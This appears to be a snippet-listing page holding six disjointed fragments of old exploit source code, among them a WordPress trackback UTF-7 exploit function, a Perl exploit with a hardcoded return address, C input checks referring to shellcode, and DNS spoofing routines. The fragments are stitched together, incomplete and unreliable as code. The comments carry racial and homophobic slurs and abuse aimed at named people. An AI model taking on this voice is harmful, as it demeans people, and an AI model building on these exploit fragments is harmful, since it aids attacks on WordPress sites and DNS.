Repositories (1)

6 snippets stored for this repo
# One of the most sloppy, unreliable and awkward exploits ever released for
    # Wordpress. The original exploit from Stefan Esser was mediocre at best.
    # No offense meant, it was just a seriously deficient piece of horse shit.
    def exploit_205_trackback_utf7
        wpuser_list = {}
        sql_query = ""
Perl IconPerl
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch! 
$retloc = 0x8053418;   # Due to unicode the filename is NOT usable. Must use file contents.
if (!(file) || ((target == -1) && (addr)))
    usage (argv[0]);
  if (strchr(file,'/'))
   { printf("NO fucking slashes douchebag\n"); exit(-1); }
  if (strlen(file) > MAX_FILENAME)
   { printf("Smaller filename please, unless you feel like editing the shell code\n");exit(-1); }
int arch=0;
char *command=0;

/* these two dns routines from dspoof/jizz */

/* pull out a compressed query name */
char *dnssprintflabel(char *s, char *buf, char *p)
*          888                                                   
 *          888                                                   
 *          888                      DID YOU EVER FEEL THE RUSH...
 *                     d8b d8b              ...FOR JIZZ?     
 *                     Y8P Y8P
 *                    8888 888 88888888 88888888

# rgod u fucking little piece of shit faggot. way to ruin a private exploit, scumbag

use strict;
use IO::Socket;
use MIME::Base64;